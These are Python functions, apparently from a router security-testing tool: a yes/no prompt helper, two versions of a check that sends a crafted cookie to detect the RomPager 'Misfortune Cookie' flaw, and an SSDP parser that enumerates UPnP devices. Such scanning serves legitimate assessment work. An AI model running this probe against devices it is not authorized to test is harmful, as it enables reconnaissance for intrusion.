def query_yes_no(question, default="yes"):
    """Prompt for a yes/no answer on stdin and return it as a boolean.

    The question is shown with ``print_yellow`` followed by a hint whose
    capital letter marks the default. The reply is read with ``input()``
    and lower-cased; "yes", "ye", "y", "no" and "n" are accepted, and the
    prompt repeats until one of them (or an empty line, when a default
    exists) is entered.

    Args:
        question: Text presented to the user.
        default: Answer assumed when the user just hits <Enter>. Must be
            "yes" (the default), "no", or None to require an explicit
            answer.

    Returns:
        True for "yes", False for "no".

    Raises:
        ValueError: If ``default`` is not "yes", "no" or None.
    """
    answers = {"yes": True, "y": True, "ye": True, "no": False, "n": False}

    if default is None:
        hint = " [y/n] "
    elif default == "yes":
        hint = " [Y/n] "
    elif default == "no":
        hint = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)

    while True:
        print_yellow(question + hint)
        reply = input().lower()
        # An empty line selects the default, when there is one.
        if reply == '' and default is not None:
            return answers[default]
        if reply in answers:
            return answers[reply]
        print_red("Please respond with 'yes' or 'no' "
                  "(or 'y' or 'n').\n")
def do_run(self, e):
    """Check the target for RomPager and the misfortune cookie indicator.

    Sends one GET for ``/blabla`` to ``self.host``:``self.port`` over plain
    HTTP, with a cookie whose value carries the marker ``omg1337hax``, and
    classifies the reply:

    * any status other than 404 is reported as "not running RomPager";
    * a 404 with no ``Server`` header, or with one that does not contain
      ``RomPager``, is reported as not RomPager;
    * a RomPager 404 whose body contains the marker is reported as
      vulnerable; without the marker the result is inconclusive and the
      device "MAY still be vulnerable".

    The marker is only looked for after the ``Server`` banner matched, so
    a device that hides or rewrites its banner is never evaluated for it.
    Timeouts and connection errors are reported and swallowed; no other
    exception is handled here.

    Args:
        e: Not read by this method.
    """
    request_headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
        'Connection': 'keep-alive',
        'Accept-Encoding': 'gzip, deflate',
        'Cache-Control': 'no-cache',
        'Cookie': 'C107373883=/omg1337hax',
    }
    url = 'http://' + self.host + ":" + self.port + '/blabla'

    try:
        reply = requests.get(url, headers=request_headers, timeout=60)

        # The check only makes sense on the 404 page of a missing path.
        if reply.status_code != 404:
            print_failed("Unexpected HTTP status, expecting 404 got: %d" % reply.status_code)
            print_red("Device is not running RomPager")
            return

        if 'server' not in reply.headers:
            print_failed("Not running RomPager")
            return

        banner = reply.headers.get('server')
        if re.search('RomPager', banner) is None:
            print_failed("RomPager not detected, device is running: %s " % banner)
            return

        print_green("Got RomPager! Server:%s" % banner)
        # Marker from the cookie showing up in the body is the indicator.
        if re.search('omg1337hax', reply.text) is None:
            print_failed("test didn't pass.")
            print_warning("Device MAY still be vulnerable")
        else:
            print_success("device is vulnerable to misfortune cookie")
    except requests.exceptions.Timeout:
        print_error("Timeout!")
    except requests.exceptions.ConnectionError:
        print_error("No route to host")
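def do_run(self, e):
    """Check the target for RomPager and the misfortune cookie indicator.

    Sends one GET for ``/blabla`` to ``self.host``:``self.port`` over plain
    HTTP (60 s timeout, redirects followed), with a cookie whose value
    carries the marker ``omg1337hax``, and classifies the reply:

    * any status other than 404 is reported as "not running RomPager";
    * a 404 with no ``server`` header, or with one that does not contain
      ``RomPager``, is reported as not RomPager;
    * a RomPager 404 whose body contains the marker is reported as
      vulnerable; without the marker the result is inconclusive and the
      device "MAY still be vulnerable".

    The marker is only looked for after the ``server`` banner matched, so
    a device that hides or rewrites its banner is never evaluated for it.

    The body is decoded with replacement characters so that a reply that
    is not valid UTF-8 cannot abort the check with UnicodeDecodeError.
    Timeouts and connection failures are reported instead of propagating
    as a traceback.

    Args:
        e: Not read by this method.
    """
    request_headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
        'Connection': 'keep-alive',
        'Accept-Encoding': 'gzip, deflate',
        'Cache-Control': 'no-cache',
        'Cookie': 'C107373883=/omg1337hax',
    }
    target = 'http://' + self.host + ":" + self.port + '/blabla'

    client = httplib2.Http(timeout=60)
    client.follow_all_redirects = True

    # Only the network call sits in the try block, so an error raised while
    # reporting is not mistaken for a connection problem.
    try:
        response, content = client.request(target, 'GET', headers=request_headers)
    except socket.timeout:
        print_error("Timeout!")
        return
    except (OSError, httplib2.ServerNotFoundError) as err:
        # Refused or unreachable connections and failed name lookups.
        print_error("Connection failed: %s" % err)
        return

    # The check only makes sense on the 404 page of a missing path.
    if response.status != 404:
        print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status)
        print_red("Device is not running RomPager")
        return

    if 'server' not in response.keys():
        print_failed("Not running RomPager")
        return

    server = response.get('server')
    if re.search('RomPager', server) is None:
        print_failed("RomPager not detected, device is running: %s " % server)
        return

    print_green("Got RomPager! Server:%s" % server)
    # The marker is ASCII, so replacing undecodable bytes cannot hide it.
    body = content.decode('utf-8', errors='replace')
    if re.search('omg1337hax', body) is not None:
        print_success("device is vulnerable to misfortune cookie")
    else:
        print_failed("test didn't pass.")
        print_warning("Device MAY still be vulnerable")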
def parse_ssdp_info(self, data, show_uniq, verbose):
    """Parse one SSDP packet and record the announcing host.

    The packet is decoded as UTF-8 and classified by its first line as a
    notification ("NOTIFY") or a reply ("HTTP/1.1 200 OK"). For those two
    kinds, the LOCATION and SERVER headers are read with
    ``self.parse_header``, the LOCATION value is split with
    ``self.parse_url``, and a new entry is added to ``self.enum_hosts``
    unless the host is already listed and ``self.uniq`` is set.

    NOTE(review): the indentation of this listing was lost. The block
    structure below is a reconstruction; in particular the final
    ``return True`` is placed inside the ``if message_type:`` branch, so
    any other packet falls through and returns None. Confirm against the
    original file.

    NOTE(review): every value handled here (raw packet, host, LOCATION
    URL, SERVER string) is taken from the received packet and is passed
    to the print helpers and stored as-is. Whether the helpers strip
    control characters is not visible here; any later fetch of
    ``xml_file`` should treat it as an untrusted URL. Confirm how callers
    use it.

    Args:
        data: Raw packet bytes. ``decode`` raises on bytes that are not
            valid UTF-8, and on the ``False`` value described in the
            inline comment below.
        show_uniq: Not read by any active line; the code that defaulted
            it from ``self.uniq`` is commented out.
        verbose: Not read by any active line; the code that defaulted it
            from ``self.verbose`` is commented out.

    Returns:
        True when a notification or reply was processed; False when the
        headers could not be parsed or the host is already known and
        ``self.uniq`` is set.
    """
    data = data.decode('utf-8')  # When Ctrl-C is pressed data is set to False and an exception should be raised
    host_found = False
    # found_location = False
    message_type = None
    # xml_file = None
    # host = False
    # page = False
    # upnp_type = None
    known_headers = {'NOTIFY': 'notification', 'HTTP/1.1 200 OK': 'reply'}

    # Disabled: use the class defaults if these aren't specified
    # if not show_uniq:
    #     show_uniq = self.uniq
    # if not verbose:
    #     verbose = self.verbose

    # Is the SSDP packet a notification, a reply, or neither?
    # The loop variable doubles as the result: on a match it holds the
    # message kind; if no prefix matches it ends up False.
    for text, message_type in known_headers.items():
        if data.upper().startswith(text):
            break
        else:
            message_type = False

    # If this is a notification or a reply message...
    if message_type:
        # Get the host name and location of its main UPNP XML file
        xml_file = self.parse_header(data, "LOCATION")
        upnp_type = self.parse_header(data, "SERVER")
        # NOTE(review): parse_url is called before xml_file is checked for
        # None; presumably it tolerates None and returns False values -
        # verify against parse_url.
        (host, page) = self.parse_url(xml_file)

        # Sanity check to make sure we got all the info we need
        if xml_file is None or host is False or page is False:
            print_error("parsing recieved header:")
            print_red(data)
            return False

        # Get the protocol in use (i.e., http, https, etc)
        protocol = xml_file.split('://')[0] + '://'

        # Check if we've seen this host before; add to the list of hosts if:
        #   1. This is a new host
        #   2. We've already seen this host, but the uniq hosts setting is disabled
        for hostID, hostInfo in self.enum_hosts.items():
            if hostInfo['name'] == host:
                host_found = True
                if self.uniq:
                    return False

        if (host_found and not self.uniq) or not host_found:
            # Get the new host's index number and create an entry in ENUM_HOSTS
            index = len(self.enum_hosts)
            self.enum_hosts[index] = {
                'name': host,
                'dataComplete': False,
                'proto': protocol,
                'xml_file': xml_file,
                'serverType': None,
                'upnpServer': upnp_type,
                'deviceList': {}
            }
            # Disabled: update the command completer so we can tab complete through this host's data structure
            # self.updateCmdCompleter(self.ENUM_HOSTS)

        # Print out some basic device info
        print_info("SSDP " + message_type + " message from " + host)
        if xml_file:
            # found_location = True
            print_info("XML file is located at " + xml_file)
        if upnp_type:
            print_info("Device is running: " + upnp_type)
        return True